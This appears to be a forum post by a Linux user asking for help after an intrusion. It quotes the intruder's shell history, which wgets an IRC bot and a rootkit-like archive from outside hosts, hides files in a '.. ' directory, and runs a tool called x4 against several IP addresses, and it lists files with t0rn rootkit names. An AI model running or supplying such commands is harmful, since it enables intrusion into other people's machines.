Aaargh!
Looks like someones been screwing with my box while I was dialed in.
This is a transcipt of some( all I hope) of what he did
[root@zane music]# history
1 w
2 ls
3 cd /tmp
4 ls
5 cd ".. "
6 mkdir ".. "
7 ls
8 cd ".. "
9 ping www.yahoo.com
10 w
11 cd /tmp
12 mkdir canadabouy
13 mkdir canadaboy
14 rm -rf canadabouy
15 cd canadaboy
16 wget cobraboy.go.ro/emech-2.8.3.tar.gz
17 tar -xzvf emech-2.8.3.tar.gz
18 cd emech-2.8.3
19 ps ux
20 logout
21 w
22 logout
23 cd /tmp
24 cd canadaboy
25 rm -rf emech-2.8.3
26 rm -rf emech-2.8.3.tar.gz
27 wget bbboby.go.ro/x.tgz
28 tar -xzvf x.tgz
29 dir
30 cd x
31 ./x4 -t80 213.233.124.146
32 ./x4 -t80 213.233.124.146
33 ./x4 -t80 213.229.61.162 f
34 ./x4 -t80 203.173.220.60
35 dir
36 ls ~
37 man x4
38 ls
39 man x4
40 ls ~
41 history
He appears to have got copies of some files then executed them then removed
them.
Can anyone tell me what that x4 thing is?
I went and got a copy of it and theses are some of the files in it.
stachel t0rnhestra t0rnp t0rns t0rnsb t0rnsniff x4
patch system t0rnmf t0rnparse t0rnsauber t0rnscan targets
It all looks very l33t h4x0r
Any thoughts?
I still need to work out how he got root.
